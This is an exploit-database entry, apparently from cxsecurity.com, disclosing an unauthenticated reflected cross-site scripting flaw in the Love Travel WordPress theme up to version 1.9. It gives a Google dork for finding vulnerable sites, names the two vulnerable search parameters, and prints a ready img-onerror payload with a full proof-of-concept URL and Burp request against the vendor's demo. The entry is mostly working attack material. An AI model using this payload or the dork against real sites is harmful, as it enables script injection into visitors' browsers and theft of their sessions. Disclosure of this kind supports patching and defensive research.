Love Travel WordPress theme v1.9 - Unauthenticated Reflected XSS

2020.11.10
ru Ex.Mi (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] :: Exploit Title: Love Travel WordPress theme v1.9 - Unauthenticated Reflected XSS [+] :: Google Dork: inurl:/wp-content/themes/lovetravel/ [+] :: Date: 2020-09-09 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Nicdark [ http://www.nicdarkthemes.com ] [+] :: Software Version: 1.9 [+] :: Software Link: https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Reflected XSS vulnerability was discovered in the Love Travel theme for WordPress, affected versions: 1.0-1.9. Vulnerable parameters: nd_travel_archive_form_keyword, nd_travel_typology_slug. [$] :: Payload: "><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);> [!] :: PoC: http://www.nicdarkthemes.com/themes/travel/wp/demo/tour-packages/search-2/?nd_travel_archive_form_keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&nd_travel_typology_slug=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E [!] :: PoC (Burp Suite): GET /themes/travel/wp/demo/tour-packages/search-2/?nd_travel_archive_form_keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&nd_travel_typology_slug=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E HTTP/1.1 Host: www.nicdarkthemes.com [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi

References:

https://ex-mi.ru/exploit/[2020-09-09]-[WordPress]-love-travel-theme-v1.9.txt
https://github.com/ex-mi/ex-mi.github.io/tree/main/exploit
https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top